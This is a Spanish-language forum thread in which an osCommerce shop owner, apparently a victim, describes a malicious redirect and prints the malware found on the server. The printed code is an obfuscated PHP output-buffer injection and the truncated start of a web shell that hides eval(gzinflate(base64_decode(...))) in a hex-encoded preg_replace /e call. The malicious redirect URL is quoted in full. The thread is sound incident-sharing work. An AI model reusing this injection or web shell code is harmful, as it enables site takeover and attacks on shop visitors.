OSCommerce Infectado

Saludos

Tengo un problema con una web basada en Oscommerce, cuando se entra en la web automáticamente se redirecciona a esta otra web atacante: http://winsantivirusbaden.com/index.php?06abQDIxQRaXVT7/qCsy38OvfjE+MiZtelsPInf8W15QM8d4QSLXftY70Fwki8dWHH Y=#sfgh20hfgGFYUHJtfgyuhjgHUIJ

La redirección ocurre aleatoriamente, creo que la primera vez que te conectas.. aunque si repites la conexión acaba entrando en la tienda sin redireccionarse.

El problema es que no sé cual será el script que esta cargando esa dirección y tampoco como buscarlo... por supuesto el agujero de seguridad que (creo) pudo ser causa de una intrusión ya fue corregido.

Cualquier ayuda es importante.
Gracias!!!!

Hola

ya encontré todas la paginas con código inyectado, y lo corregí. Más abajo escribo el código inyectado en la muchos php y también un php metido en la carpeta images (new_products_rss.php) con un código diferente.

Lo que ahora me preocupa es el cómo pudieron modificar los permisos a 777 cuando estaban a 775, estoy casi convencido de que no obtuvieron la contraseña por FTP... aunque por supuesto la modifique por seguridad. Había instalado un módulo de compra sin registro el cual me deje la carpeta instaladora... un error grave de seguridad, pero no sé si a partir de ahí pudieron obtener permisos a otras carpetas... si así fue puedo respirar tranquilo. (el módulo PWA coje permisos a archivos como login..etc, que son justamente los que estaban con código inyectado... eso debió ser).

Pues por si es de interés escribo el código inyectado:

if(!$ob_starting) {
function ob_start_flush($s) {
$tc = array(0, 69, ..., 51); una buena lista númerica
$tr = array(51, ... , ) una buena lista númerica
$ob_htm = ''; foreach($tr as $tval) {
$ob_htm .= chr($tc[$tval]+32);
}

$slw=strtolower($s);
$i=strpos($slw,'</script');if($i){$i=strpos($slw,'>',$i);}
if(!$i){$i=strpos($slw,'</div');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</table');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</form');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</p');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</body');if($i){$i--;}}
if(!$i){$i=strlen($s);if($i){$i--;}}
$i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i);

return $s;
}
$ob_starting = time();
@ob_start("ob_start_flush");
} ?>

Y el archivo new_productos_rss.php además de lo anterior tenía lo siguiente:

<?php $auth_pass="";$color="#df5";$default_action='Files Man';$default_use_ajax=true;$default_charset='Wind ows-1251';preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x 61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65 \x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNk Wf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlu.. . ETCETERA...


Un saludo

hola dariodafoz, tengo exactamente el mismo problema y por lo que veo es complicado ya que osCommerce no tiene parches. Google tiene el sitio bloqueado y firefox también.
Tengo un respaldo limpio pero tengo miedo que se me vuelva a infectar.

Saludos!